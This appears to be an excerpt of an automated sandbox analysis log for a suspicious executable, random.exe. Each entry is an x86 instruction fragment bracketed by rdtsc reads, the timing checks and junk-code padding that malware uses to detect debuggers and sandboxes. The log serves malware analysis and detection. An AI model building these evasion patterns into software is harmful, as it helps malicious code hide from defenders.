Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8680FB second address: 8680FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8680FF second address: 868105 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 868105 second address: 868124 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F3C150B7571h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 868471 second address: 8684FA instructions: 0x00000000 rdtsc 0x00000002 je 00007F3C153246DCh 0x00000008 js 00007F3C153246D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F3C153246D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b lea eax, dword ptr [ebp+1247BFABh] 0x00000031 mov dword ptr [ebp+122D35FBh], ebx 0x00000037 push eax 0x00000038 push edi 0x00000039 jmp 00007F3C153246E0h 0x0000003e pop edi 0x0000003f mov dword ptr [esp], eax 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F3C153246D8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c mov edi, dword ptr [ebp+122D2D00h] 0x00000062 lea eax, dword ptr [ebp+1247BF67h] 0x00000068 add edx, dword ptr [ebp+122D1C7Dh] 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8684FA second address: 8684FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8684FE second address: 868504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 868504 second address: 8501EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3C150B756Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call dword ptr [ebp+122D320Bh] 0x00000013 pushad 0x00000014 ja 00007F3C150B7568h 0x0000001a ja 00007F3C150B7576h 0x00000020 jmp 00007F3C150B756Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 jnc 00007F3C150B7566h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A724A second address: 8A7267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F3C153246D6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7267 second address: 8A726B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7557 second address: 8A755D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A755D second address: 8A7566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7566 second address: 8A756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A756C second address: 8A7580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A770C second address: 8A7711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7711 second address: 8A773B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3C150B7576h 0x00000008 jne 00007F3C150B7566h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A78CD second address: 8A78F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C153246DBh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F3C153246DEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A78F0 second address: 8A78FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C150B756Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7A4E second address: 8A7A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3C153246DAh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007F3C153246E3h 0x00000015 jmp 00007F3C153246DEh 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7A88 second address: 8A7A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7A8C second address: 8A7A92 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7A92 second address: 8A7A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A7A97 second address: 8A7A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B0552 second address: 8B055C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B055C second address: 8B0566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3C153246D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B0566 second address: 8B0586 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3C150B7566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c push ecx 0x0000000d jmp 00007F3C150B756Ah 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B0586 second address: 8B058A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B0124 second address: 8B0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007F3C150B756Eh 0x0000000b jp 00007F3C150B756Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F3C150B7566h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B02B2 second address: 8B02BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B02BA second address: 8B02C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2DF9 second address: 8B2E03 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3C153246DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E03 second address: 8B2E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F3C150B7572h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E13 second address: 8B2E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E19 second address: 8B2E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3C150B7579h 0x0000000a jmp 00007F3C150B7575h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E4E second address: 8B2E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E53 second address: 8B2E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E58 second address: 8B2E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E5E second address: 8B2E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F3C150B756Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B2E76 second address: 8B2E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B315E second address: 8B3164 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B3164 second address: 8B316A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B316A second address: 8B3190 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jo 00007F3C150B7566h 0x00000015 popad 0x00000016 jmp 00007F3C150B7570h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B8627 second address: 8B862D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B862D second address: 8B8639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B8639 second address: 8B863D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B863D second address: 8B8649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3C150B7566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B8A26 second address: 8B8A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 867E64 second address: 867E72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3C150B7566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 867F56 second address: 867F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 867F5A second address: 867F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8B8FA9 second address: 8B8FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BD872 second address: 8BD878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BD878 second address: 8BD87E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8BD27E second address: 8BD286 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C0C5D second address: 8C0C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C153246E3h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C0DDF second address: 8C0DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C0DE3 second address: 8C0E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3C153246E7h 0x0000000d push eax 0x0000000e jnc 00007F3C153246D6h 0x00000014 jmp 00007F3C153246DAh 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C0E18 second address: 8C0E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C9CC9 second address: 8C9CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C9CCD second address: 8C9CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C7C22 second address: 8C7C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3C153246D6h 0x0000000a pop eax 0x0000000b jmp 00007F3C153246DAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C7C37 second address: 8C7C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3C150B7574h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C8219 second address: 8C8227 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3C153246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C8227 second address: 8C822B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C822B second address: 8C8234 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C8A43 second address: 8C8A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3C150B7566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C8A4D second address: 8C8A53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C8CFD second address: 8C8D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C8D01 second address: 8C8D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3C153246D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C8D0B second address: 8C8D2D instructions: 0x00000000 rdtsc 0x00000002 js 00007F3C150B7566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F3C150B7572h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C9963 second address: 8C9981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3C153246E5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C9981 second address: 8C9985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C9985 second address: 8C9995 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3C153246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8C9995 second address: 8C99C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7578h 0x00000007 jl 00007F3C150B7566h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F3C150B7566h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D253D second address: 8D2565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jno 00007F3C153246F1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D2565 second address: 8D25CB instructions: 0x00000000 rdtsc 0x00000002 js 00007F3C150B7568h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3C150B7577h 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jmp 00007F3C150B7578h 0x0000001f jmp 00007F3C150B756Fh 0x00000024 jmp 00007F3C150B7572h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D16E9 second address: 8D1712 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F3C153246F6h 0x0000000e pushad 0x0000000f jmp 00007F3C153246E4h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 82900F second address: 829013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D19C3 second address: 8D19E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3C153246EFh 0x0000000c jmp 00007F3C153246E7h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D19E8 second address: 8D19ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D1E13 second address: 8D1E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D226D second address: 8D2273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D2273 second address: 8D2285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C153246DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8D2285 second address: 8D228B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DD5BE second address: 8DD5E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3C153246DEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DB975 second address: 8DB97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DB97B second address: 8DB986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DC335 second address: 8DC33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DC33B second address: 8DC341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DC485 second address: 8DC497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F3C150B7568h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DC497 second address: 8DC4AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F3C153246D6h 0x0000000b popad 0x0000000c js 00007F3C153246DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DC5FD second address: 8DC635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C150B7577h 0x00000009 jmp 00007F3C150B756Fh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3C150B756Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DB3B9 second address: 8DB3D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8DB3D6 second address: 8DB3F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7577h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8E2993 second address: 8E29B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F3C153246FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3C153246E4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8E2B14 second address: 8E2B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
